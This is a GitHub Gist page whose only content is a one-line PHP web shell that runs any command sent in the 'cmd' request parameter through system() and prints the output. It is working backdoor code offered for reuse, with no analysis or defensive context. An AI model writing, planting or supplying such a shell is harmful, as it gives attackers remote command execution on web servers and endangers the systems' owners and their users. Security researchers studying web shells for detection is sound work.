Skip to content

Instantly share code, notes, and snippets.

@vay3t
Created February 17, 2019 20:13
Show Gist options
  • Save vay3t/3d0075e240b709bf8914d9bff6ef350a to your computer and use it in GitHub Desktop.
Save vay3t/3d0075e240b709bf8914d9bff6ef350a to your computer and use it in GitHub Desktop.
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment